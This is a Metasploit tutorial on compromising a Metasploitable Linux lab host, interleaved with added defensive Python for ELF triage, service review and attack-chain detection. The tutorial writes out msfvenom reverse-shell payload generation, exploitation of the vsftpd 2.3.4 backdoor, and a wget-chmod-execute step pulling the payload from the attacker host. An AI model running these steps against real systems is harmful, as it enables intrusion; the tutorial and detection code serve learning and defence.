Preface
Using Metasploit to perform a penetration test against a Linux system
一、Generate the payload
Use the msfvenom command to create an ELF file
┌──(root💀kali)-[~]
└─# msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.113 lport=5555 -f elf>pay.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Move the payload into the www directory (remember to start the apache2 service)
┌──(root💀kali)-[~]
└─# mv pay.elf /var/www/html
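The msfvenom output above reports a 123-byte payload wrapped into a 207-byte ELF file. Those numbers fit a 52-byte ELF32 header, one 32-byte program header and the code, with nothing else in the file, and that bare layout is also what a defender can key on when such a file lands on a host. The following is an added example, not code from the original post or from Metasploit: it builds a constructed stand-in with the same header layout (NOP padding instead of any real payload, so the bytes are not msfvenom's) and runs header-level triage over it. Field names, the trait list and the "three traits" threshold are this example's own choices.

```python
import struct

# Added example (not from the original post): header-level triage of a small
# ELF file in the "headers immediately followed by code" layout. The page's
# sizes (123-byte payload, 207-byte file) match 52 + 32 + 123, so the sample
# builder reproduces that layout; the code region is NOP padding (0x90).
ELF32_EHDR = "<HHIIIIIHHHHHH"   # fields after the 16-byte e_ident
ELF32_PHDR = "<IIIIIIII"
ELF64_EHDR = "<HHIQQQIHHHHHH"
ELF64_PHDR = "<IIQQQQQQ"
PT_LOAD = 1
PF_X, PF_W, PF_R = 1, 2, 4
RWX = PF_R | PF_W | PF_X
MACHINES = {3: "x86", 62: "x86-64", 40: "arm", 183: "aarch64"}


def build_sample_elf(code_len=123, p_flags=RWX):
    """Constructed ELF32 image: one RWX PT_LOAD covering headers plus code."""
    base, hdr_len = 0x08048000, 52 + 32
    total = hdr_len + code_len
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, LSB, v1
    ehdr = e_ident + struct.pack(
        ELF32_EHDR,
        2, 3, 1,            # ET_EXEC, EM_386, EV_CURRENT
        base + hdr_len,     # e_entry: the first byte after the headers
        52, 0, 0,           # e_phoff, e_shoff (no section table), e_flags
        52, 32, 1,          # e_ehsize, e_phentsize, e_phnum
        0, 0, 0)            # e_shentsize, e_shnum, e_shstrndx
    phdr = struct.pack(ELF32_PHDR, PT_LOAD, 0, base, base, total, total, p_flags, 0x1000)
    return ehdr + phdr + b"\x90" * code_len


def parse_headers(data):
    """Decode the ELF header and program headers (ELF32 or ELF64, little-endian)."""
    if len(data) < 52 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2
    ehdr_fmt, phdr_fmt = (ELF64_EHDR, ELF64_PHDR) if is64 else (ELF32_EHDR, ELF32_PHDR)
    f = struct.unpack_from(ehdr_fmt, data, 16)
    hdr = {"machine": f[1], "entry": f[3], "phoff": f[4], "shoff": f[5],
           "phentsize": f[8], "phnum": f[9], "shnum": f[11], "segments": []}
    for i in range(hdr["phnum"]):
        p = struct.unpack_from(phdr_fmt, data, hdr["phoff"] + i * hdr["phentsize"])
        if is64:   # Elf64_Phdr places p_flags second
            p_type, p_flags, p_offset, p_vaddr, _, _, p_memsz, _ = p
        else:      # Elf32_Phdr places p_flags after p_memsz
            p_type, p_offset, p_vaddr, _, _, p_memsz, p_flags, _ = p
        hdr["segments"].append({"type": p_type, "offset": p_offset, "vaddr": p_vaddr,
                                "memsz": p_memsz, "flags": p_flags})
    hdr["headers_end"] = hdr["phoff"] + hdr["phnum"] * hdr["phentsize"]
    return hdr


def analyze_elf(data):
    """Return the dropper-style traits visible in the headers alone."""
    h = parse_headers(data)
    findings = []
    if h["shnum"] == 0 and h["shoff"] == 0:
        findings.append("no section header table")
    if len(h["segments"]) == 1:
        findings.append("single program header")
    rwx = [s for s in h["segments"] if s["type"] == PT_LOAD and (s["flags"] & RWX) == RWX]
    if rwx:
        findings.append("%d RWX PT_LOAD segment(s)" % len(rwx))
    for s in h["segments"]:
        if s["type"] == PT_LOAD and s["vaddr"] <= h["entry"] < s["vaddr"] + s["memsz"]:
            if h["entry"] - s["vaddr"] + s["offset"] == h["headers_end"]:
                findings.append("entry point is the first byte after the headers (0x%x)" % h["entry"])
            break
    if len(data) < 4096:
        findings.append("tiny image (%d bytes)" % len(data))
    return findings


def describe_arch(data):
    return MACHINES.get(parse_headers(data)["machine"], "unknown")


def is_suspicious(data):
    """Triage threshold used by this example: three or more traits together."""
    return len(analyze_elf(data)) >= 3


if __name__ == "__main__":
    sample = build_sample_elf()
    print(describe_arch(sample), len(sample), "bytes")
    for line in analyze_elf(sample):
        print(" -", line)
```

Legitimate hand-written static binaries can trip the same traits, so the result is a triage signal, not a verdict. The architecture field is worth reporting for another reason the page illustrates: the msfvenom line above produced a linux/x86 payload, while the handler in section 三 is configured for linux/x64/meterpreter/reverse_tcp; the stager and the handler's payload setting have to agree, and e_machine tells a responder which one actually arrived.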
二、Gain access to the target host
1. Obtain it through social engineering
2. Find vulnerabilities present on the target host and exploit them
The second approach is described here
① Start the postgresql service and load the msf database
② Scan the target host with nmap to find exploitable vulnerabilities
③ Exploit with the corresponding module and obtain access
┌──(root💀kali)-[~]
└─# service postgresql start
┌──(root💀kali)-[~]
└─# service apache2 start
msf6 > db_nmap -sV -u 192.168.1.103
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-13 12:30 CST
[*] Nmap: Nmap scan report for 192.168.1.103
[*] Nmap: Host is up (0.0027s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
......
[*] Nmap: Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 12.28 seconds
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.1 80 tcp http open
192.168.1.1 1900 tcp upnp open
192.168.1.101 548 tcp afp filtered
192.168.1.102 8080 tcp tcpwrapped open
192.168.1.103 21 tcp ftp open vsftpd 2.3.4
192.168.1.103 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.103 23 tcp telnet open Linux telnetd
192.168.1.103 25 tcp smtp open Postfix smtpd
192.168.1.103 53 tcp domain open ISC BIND 9.4.2
192.168.1.103 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
....
msf6 >
vsftpd 2.3.4 is found; this service has a vulnerability and can be exploited (a previous article explained in detail how to exploit vsftpd 2.3.4)
See: vsftpd 2.3.4 penetration testing and privilege-escalation beginner tutorial
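The `services` table above is exactly the inventory a defender would want to review before an attacker does. The following is an added example, not code from the original post or from Metasploit: it parses a constructed copy of the rows shown on the page (same whitespace-separated layout as the console output) and runs a small set of exposure rules over them. The rule list is this example's own: the vsftpd 2.3.4 entry is the service the page goes on to exploit, and the remaining rules are general hygiene checks for cleartext protocols and end-of-life software branches.

```python
import re

# Constructed copy of the `services` rows shown on the page (console layout:
# host, port, proto, name, state, then the free-text info column).
SERVICES_OUTPUT = """\
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.1.1 80 tcp http open
192.168.1.103 21 tcp ftp open vsftpd 2.3.4
192.168.1.103 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.1.103 23 tcp telnet open Linux telnetd
192.168.1.103 25 tcp smtp open Postfix smtpd
192.168.1.103 53 tcp domain open ISC BIND 9.4.2
192.168.1.103 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
"""

# host, port, proto, name, state, optional info; the header and rule lines
# fail the \d+ port match and are skipped automatically.
LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Rule = (service name column, pattern over the info column, severity, finding).
# An empty pattern matches any info text, so the protocol-level rules fire on
# every open instance of that service.
RULES = [
    ("ftp", re.compile(r"vsftpd 2\.3\.4\b"), "critical",
     "vsftpd 2.3.4: the release with the known backdoor (the page's exploit path); upgrade or remove"),
    ("ssh", re.compile(r"OpenSSH 4\."), "high", "OpenSSH 4.x: end-of-life branch"),
    ("http", re.compile(r"Apache httpd 2\.2\."), "high", "Apache httpd 2.2: end-of-life branch"),
    ("domain", re.compile(r"ISC BIND 9\.4\."), "high", "BIND 9.4: end-of-life branch"),
    ("telnet", re.compile(r""), "medium", "telnet: cleartext remote login; replace with SSH"),
    ("ftp", re.compile(r""), "low", "FTP: cleartext credentials unless TLS is enforced"),
]
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


def parse_services(text):
    """Turn the console table into a list of row dicts."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        host, port, proto, name, state, info = m.groups()
        rows.append({"host": host, "port": int(port), "proto": proto,
                     "name": name, "state": state, "info": (info or "").strip()})
    return rows


def review(rows):
    """Apply RULES to every open service; returns (host, port, severity, finding) tuples."""
    findings = []
    for r in rows:
        if r["state"] != "open":
            continue
        for name, pattern, severity, message in RULES:
            if r["name"] == name and pattern.search(r["info"]):
                findings.append((r["host"], r["port"], severity, message))
    return sorted(findings, key=lambda f: (SEVERITY_ORDER[f[2]], f[0], f[1]))


if __name__ == "__main__":
    for host, port, severity, message in review(parse_services(SERVICES_OUTPUT)):
        print(f"{severity:8} {host}:{port}  {message}")
```

Version strings from a banner scan are only as trustworthy as the banner, so a finding here is a prompt to check the package actually installed; in this lab the scan is accurate and the critical row is the one the rest of the page exploits.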
[*] 192.168.1.103:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.1.103:21 - USER: 331 Please specify the password.
[+] 192.168.1.103:21 - Backdoor service has been spawned, handling...
[+] 192.168.1.103:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.103:6200) at 2021-05-13 12:37:16 +0800
wget http://192.168.1.113/pay.elf
--06:57:46-- http://192.168.1.113/pay.elf
=> `pay.elf'
Connecting to 192.168.1.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
0K 100% 37.10 MB/s
06:57:46 (37.10 MB/s) - `pay.elf' saved [207/207]
chmod 777 pay.elf
./pay.elf
Download the file with the wget command, change its permissions and run it
三、Load the handler on the controlling end
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:5555
[*] Sending stage (3012548 bytes) to 192.168.1.103
Wait for the handler on the controlling end to receive the connection; the penetration test of the Linux system is complete
Summary
This article briefly introduced using Metasploit to penetrate a Linux system and escalate privileges. Access to the Linux host was obtained through the common vsftpd 2.3.4 vulnerability, then a handler was started on the controlling end to complete the privilege escalation. For learning purposes only
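Sections 二 and 三 together leave a very recognisable trail on the victim: the FTP daemon opens a listener on an unexpected port (6200 in the session output), a shell appears under that daemon, wget fetches a file, chmod 777 makes it executable, the file is run, and the new process calls back to 192.168.1.113:5555. The following is an added example, not code from the original post or from Metasploit: it replays that chain as constructed process and socket events in a simplified format (the field names are this example's own, standing in for whatever auditd, eBPF or EDR telemetry a site actually collects) and applies four rules that each fire on one link of the chain. The per-daemon port allowlist is likewise constructed policy.

```python
# Added example (not from the original post): host-side detection of the
# chain shown in sections 二 and 三, over constructed telemetry events.
EVENTS = [
    {"t": 1, "kind": "exec", "pid": 3000, "ppid": 1, "comm": "vsftpd", "argv": "/usr/sbin/vsftpd"},
    {"t": 2, "kind": "listen", "pid": 3000, "port": 6200},
    {"t": 3, "kind": "exec", "pid": 3100, "ppid": 3000, "comm": "sh", "argv": "/bin/sh"},
    {"t": 4, "kind": "exec", "pid": 3101, "ppid": 3100, "comm": "wget",
     "argv": "wget http://192.168.1.113/pay.elf"},
    {"t": 5, "kind": "exec", "pid": 3102, "ppid": 3100, "comm": "chmod", "argv": "chmod 777 pay.elf"},
    {"t": 6, "kind": "exec", "pid": 3103, "ppid": 3100, "comm": "pay.elf", "argv": "./pay.elf"},
    {"t": 7, "kind": "connect", "pid": 3103, "dst": "192.168.1.113", "port": 5555},
]

# Constructed policy: ports each network daemon is allowed to listen on. An
# FTP server's passive range must be included or every data connection alerts.
EXPECTED_PORTS = {"vsftpd": {21} | set(range(40000, 40100)), "sshd": {22}, "apache2": {80, 443}}
NETWORK_DAEMONS = set(EXPECTED_PORTS)
SHELLS = {"sh", "bash", "dash"}
DOWNLOADERS = {"wget", "curl"}


def grants_exec(mode):
    """True if a chmod mode sets an execute bit (octal such as 777, or symbolic such as +x)."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return any(("+" in c or "=" in c) and "x" in c.split("=")[-1].split("+")[-1]
               for c in mode.split(","))


def basename(path):
    return path.rsplit("/", 1)[-1]


def detect(events):
    """Return (rule, pid, detail) alerts for the daemon->shell->download->exec->callback chain."""
    procs = {}          # pid -> exec event, for ancestry walks
    downloaded = set()  # basenames fetched by a downloader running under a network daemon
    exec_bits = set()   # downloaded basenames later granted an execute bit
    dropped = set()     # pids executing one of those files
    alerts = []

    def ancestor_daemon(pid):
        for _ in range(64):              # bounded walk up the ppid chain
            p = procs.get(pid)
            if p is None:
                return None
            if p["comm"] in NETWORK_DAEMONS:
                return p["comm"]
            pid = p["ppid"]
        return None

    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["kind"] == "exec":
            procs[ev["pid"]] = ev
            daemon = ancestor_daemon(ev["ppid"])
            comm, args = ev["comm"], ev["argv"].split()
            if comm in SHELLS and daemon:
                alerts.append(("daemon_spawned_shell", ev["pid"], f"{daemon} -> {comm}"))
            if comm in DOWNLOADERS and daemon and len(args) >= 2:
                downloaded.add(basename(args[-1]))
                alerts.append(("download_from_daemon_shell", ev["pid"], args[-1]))
            if comm == "chmod" and len(args) >= 3 and grants_exec(args[1]):
                if basename(args[-1]) in downloaded:
                    exec_bits.add(basename(args[-1]))
            if basename(args[0]) in exec_bits:
                dropped.add(ev["pid"])
                alerts.append(("download_chmod_execute", ev["pid"], basename(args[0])))
        elif ev["kind"] == "listen":
            p = procs.get(ev["pid"])
            if p and p["comm"] in EXPECTED_PORTS and ev["port"] not in EXPECTED_PORTS[p["comm"]]:
                alerts.append(("unexpected_listener", ev["pid"], f'{p["comm"]} listening on {ev["port"]}'))
        elif ev["kind"] == "connect" and ev["pid"] in dropped:
            alerts.append(("reverse_connection", ev["pid"], f'{ev["dst"]}:{ev["port"]}'))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:28} pid={pid:<6} {detail}")
```

Each rule is weak on its own (administrators run wget, daemons fork helpers), which is why the chain is tracked as state rather than matched line by line: the execute alert only fires for a file that was downloaded under a daemon and then had an execute bit added, and the callback alert only for a process running such a file. The unexpected-listener rule is the one that catches this page's entry point specifically, since a correctly configured FTP server has no reason to listen on 6200.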